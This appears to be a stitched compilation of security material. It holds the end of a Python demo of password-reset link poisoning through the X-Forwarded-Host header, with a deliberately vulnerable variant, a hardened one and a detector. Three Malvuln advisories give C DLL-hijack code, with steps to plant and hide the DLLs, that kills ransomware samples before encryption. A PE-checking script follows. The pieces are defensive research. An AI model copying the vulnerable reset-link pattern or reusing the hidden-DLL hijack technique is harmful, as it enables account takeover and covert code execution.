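    # safe="/" keeps the p=admin/set-password form the advisory shows
    return urlencode({"p": RESET_ENDPOINT, "code": code, "id": user_id}, safe="/")


def reset_link_vulnerable(headers, code, user_id):
    """Builds the link host from the request, preferring the proxy header
    X-Forwarded-Host over Host. Whoever can set that header decides where
    the secret code/id tokens are delivered."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"http://{host}/index.php?{_reset_query(code, user_id)}"


def reset_link_hardened(headers, code, user_id):
    """Ignores every request-derived host and builds the link from the
    explicitly configured site URL. `headers` is accepted only so both
    variants share a signature; it is deliberately unused."""
    base = CONFIGURED_SITE_URL.rstrip("/")
    return f"{base}/index.php?{_reset_query(code, user_id)}"


def poisoning_indicators(headers):
    """Detection helper for reset requests: returns (header, value) pairs
    whose host part differs from the configured site host. These are the
    headers an attacker must tamper with to poison the link."""
    expected = urlsplit(CONFIGURED_SITE_URL).hostname.lower()
    findings = []
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is None:
            continue
        host = value.split(":", 1)[0].strip().lower()  # drop any :port
        if host != expected:
            findings.append((name, value))
    return findings


if __name__ == "__main__":
    code, uid = "D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u", "48b9fe48-91c9-430e-baa2-5bdf66c88102"
    print("vulnerable:", reset_link_vulnerable(POISONED_REQUEST_HEADERS, code, uid))
    print("hardened:  ", reset_link_hardened(POISONED_REQUEST_HEADERS, code, uid))
    print("indicators:", poisoning_indicators(POISONED_REQUEST_HEADERS))
```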
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/de25f04dedaffde1be47ef26dc9a8176.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.CTBLocker<br />Vulnerability: Code Execution<br />Description: CTBLocker looks for and executes DLLs in its current directory. Therefore, we can hijack a vulnerable DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our own process ID and terminate. We do not need to rely on hash signatures or third-party products; the malware's flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. 
All basic tests were conducted successfully in a virtual machine environment.<br />Family: CTBLocker<br />Type: PE32<br />MD5: de25f04dedaffde1be47ef26dc9a8176<br />Vuln ID: MVID-2022-0586<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=koXDYNI5ngQ<br /><br /><br />Exploit/PoC:<br />1) Compile the following C code as "SHFOLDER.DLL" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "SHFOLDER.DLL"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: <br />//gcc -c SHFOLDER.c -m32<br />//gcc -shared -o SHFOLDER.DLL SHFOLDER.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. 
Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/ae99e6a451bc53830be799379f5c1104.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Cerber<br />Vulnerability: Code Execution<br />Description: Cerber looks for and loads DLLs from its current directory, so we can plant a DLL under a name it expects, get our own code executed inside the malware process, and control and terminate it pre-encryption. The PoC DLL checks whether the current directory is "C:\Windows\System32"; if it is not, the DLL has been loaded from the planted copy, so it grabs its own process ID and terminates the process. We do not need to rely on hash signatures or third-party products, the malware's own flaw does the work for us. Endpoint protection systems and antivirus can potentially be killed before the malware executes, but this method cannot, because there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cerber<br />Type: PE32<br />MD5: ae99e6a451bc53830be799379f5c1104<br />Vuln ID: MVID-2022-0585<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=1FVDZcrgN1U<br /><br />Exploit/PoC:<br />1) Compile the following C code as "CLDAPI.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "CLDAPI.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "string.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: planted as CLDAPI.dll next to the sample; terminates the process that loads it (the malware)<br />//gcc -c CLDAPI.c -m32<br />//gcc -shared -o CLDAPI.dll CLDAPI.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />    char buf[MAX_PATH];<br />    switch (reason) {<br />    case DLL_PROCESS_ATTACH:<br />        MessageBoxA(NULL, "Code Exec", "by malvuln", MB_OK);<br />        // Loaded from anywhere other than System32 means the planted copy was picked up,<br />        // so terminate the host process. Windows paths are case-insensitive, hence _stricmp.<br />        if(GetCurrentDirectoryA(MAX_PATH, buf))<br />            if(_stricmp("C:\\Windows\\System32", buf) != 0){<br />                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br />                if (NULL != handle) {<br />                    TerminateProcess(handle, 0);<br />                    CloseHandle(handle);<br />                }<br />            }<br />        break;<br />    }<br />    return TRUE;<br />}<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/3b200c8173a92c94441cb062d38012f6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.LockerGoga<br />Vulnerability: Code Execution<br />Description: LockerGoga looks for and loads a DLL named "wow64log.dll" from Windows\System32, so we can drop our own DLL there to intercept and terminate the malware pre-encryption. The malware spawns four processes, e.g. "imtvknqq9737.exe", running under AppData\Local\Temp; the process name is "imtvknqq" plus an appended random number. Our exploit DLL simply displays a Win32 API message box and calls exit(). The exploit DLL must export an "InterlockedExchange" function or the load fails with an error. We do not need to rely on hash signatures or third-party products, the malware's own flaw does the work for us. Endpoint protection systems and antivirus can potentially be killed before the malware executes, but this method cannot, because there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. Caveat: wow64log.dll in System32 is a name the WoW64 layer itself probes for when 32-bit processes start on 64-bit Windows, so a DLL there that calls exit() from DllMain is not specific to LockerGoga and can take down other 32-bit processes that load it; keep it to a test VM, or have DllMain check the host process before exiting, as the sibling PoCs check the current directory. All basic tests were conducted successfully in a virtual machine environment.<br />Family: LockerGoga<br />Type: PE32<br />MD5: 3b200c8173a92c94441cb062d38012f6<br />Vuln ID: MVID-2022-0587<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=1_7vmbHmCQQ<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows/System32<br />3) Run the malware then BOOM!<br /><br />#include "windows.h"<br />#include "stdlib.h"<br /><br />//By malvuln - 5/2022<br />//Target: Trojan-Ransom.LockerGoga<br />//MD5: 3b200c8173a92c94441cb062d38012f6<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c<br />//gcc -shared -o wow64log.dll wow64log.o<br />//DLL must live under Windows/System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />    switch (reason) {<br />    case DLL_PROCESS_ATTACH:<br />        MessageBoxA(NULL, "Code Exec", "by malvuln", MB_OK);<br />        exit(0);   // ends the loading process (the malware) before it can encrypt<br />        break;<br />    }<br />    return TRUE;<br />}<br /><br />// LockerGoga resolves this export after loading the DLL; without it the load fails.<br />// The stub also ends the process if it is ever called.<br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange(LONG volatile *Target, LONG Value){<br />    exit(1);<br />}<br /><br /></code></pre>
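Before planting one of these DLLs, the check a practitioner wants is that the compiled artifact matches what the advisories call for: SHFOLDER.DLL and CLDAPI.dll built 32-bit, wow64log.dll built x64 and exporting InterlockedExchange (the LockerGoga advisory notes the load fails without that export). The following stdlib-only Python checker is an added example for this page, not malvuln's code. It reads the PE Machine field, the optional-header magic and the export name table, and its self-test runs on a PE image constructed inline (headers plus an export table only, not a loadable DLL). The script name and the `<dll> <32|64> [export ...]` argument convention are this example's own assumptions.

```python
"""Pre-flight check for a compiled vaccine DLL: right bitness, required exports present.

Added example, not malvuln's code. Stdlib-only PE parsing; the image used by the
self-test is constructed by build_test_pe() and carries only headers and an export table.
"""
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def _rva_to_off(rva, sections):
    """Translate an RVA to a file offset through the section table."""
    for va, vsize, rawptr, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def pe_exports(data):
    """Return (machine, bits, exported names) for a PE image given as bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == PE32_MAGIC:          # data directories start 96 bytes into a PE32 optional header
        bits, dd_off = 32, opt_off + 96
    elif magic == PE32PLUS_MAGIC:    # and 112 bytes into a PE32+ one
        bits, dd_off = 64, opt_off + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sec_tbl = opt_off + opt_size
    # Section header fields at +8: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    raw = [struct.unpack_from("<IIII", data, sec_tbl + 40 * i + 8) for i in range(nsec)]
    sections = [(va, vs, rp, rs) for vs, va, rs, rp in raw]
    export_rva = struct.unpack_from("<I", data, dd_off)[0]       # directory entry 0 = exports
    if export_rva == 0:
        return machine, bits, []
    ed = _rva_to_off(export_rva, sections)
    # IMAGE_EXPORT_DIRECTORY from offset 20: NumberOfFunctions, NumberOfNames,
    # AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    _, nnames, _, names_rva, _ = struct.unpack_from("<IIIII", data, ed + 20)
    names = []
    for i in range(nnames):
        name_rva = struct.unpack_from("<I", data, _rva_to_off(names_rva + 4 * i, sections))[0]
        names.append(_cstr(data, _rva_to_off(name_rva, sections)))
    return machine, bits, names


def check_vaccine(data, expected_bits, required_exports=()):
    """Return a list of problems; an empty list means the DLL fits the target it is meant for."""
    machine, bits, names = pe_exports(data)
    problems = []
    if bits != expected_bits:
        problems.append("built as %d-bit, target needs %d-bit" % (bits, expected_bits))
    want = IMAGE_FILE_MACHINE_I386 if bits == 32 else IMAGE_FILE_MACHINE_AMD64
    if machine != want:
        problems.append("Machine 0x%04x does not match a %d-bit image" % (machine, bits))
    for sym in required_exports:
        if sym not in names:
            problems.append("missing export %s" % sym)
    return problems


def build_test_pe(bits, export_names, machine=None):
    """Constructed fixture: minimal PE with one .edata section; not loadable, parse-only."""
    if machine is None:
        machine = IMAGE_FILE_MACHINE_I386 if bits == 32 else IMAGE_FILE_MACHINE_AMD64
    magic, opt_size, dd_off = (PE32_MAGIC, 224, 96) if bits == 32 else (PE32PLUS_MAGIC, 240, 112)
    sec_rva, sec_raw, n = 0x1000, 0x200, len(export_names)
    funcs_rva = sec_rva + 40                         # the export directory itself is 40 bytes
    names_rva, ords_rva = funcs_rva + 4 * n, funcs_rva + 8 * n
    str_rva = ords_rva + 2 * n
    strings, name_rvas = b"", []
    for s in export_names:
        name_rvas.append(str_rva + len(strings))
        strings += s.encode("ascii") + b"\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, 0, 1, n, n, funcs_rva, names_rva, ords_rva)
    body += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))   # fake code RVAs
    body += b"".join(struct.pack("<I", r) for r in name_rvas)
    body += b"".join(struct.pack("<H", i) for i in range(n))
    body += strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<II", opt, dd_off, sec_rva, len(body))              # export data directory
    sec = b".edata".ljust(8, b"\0") + struct.pack("<IIII", len(body), sec_rva, len(body), sec_raw) + b"\0" * 16
    return (dos + coff + bytes(opt) + sec).ljust(sec_raw, b"\0") + body


if __name__ == "__main__":
    # usage: python vaccine_check.py <dll> <32|64> [export ...]   (example's own convention)
    issues = check_vaccine(open(sys.argv[1], "rb").read(), int(sys.argv[2]), sys.argv[3:])
    print("OK" if not issues else "\n".join(issues))
    sys.exit(1 if issues else 0)
```

Run it as `python vaccine_check.py wow64log.dll 64 InterlockedExchange` for the LockerGoga DLL and `python vaccine_check.py SHFOLDER.DLL 32` for the 32-bit ones; a non-zero exit lists what is off. The check deliberately stops at the file: whether the malware actually picks the DLL up still has to be confirmed in the VM as the advisories describe.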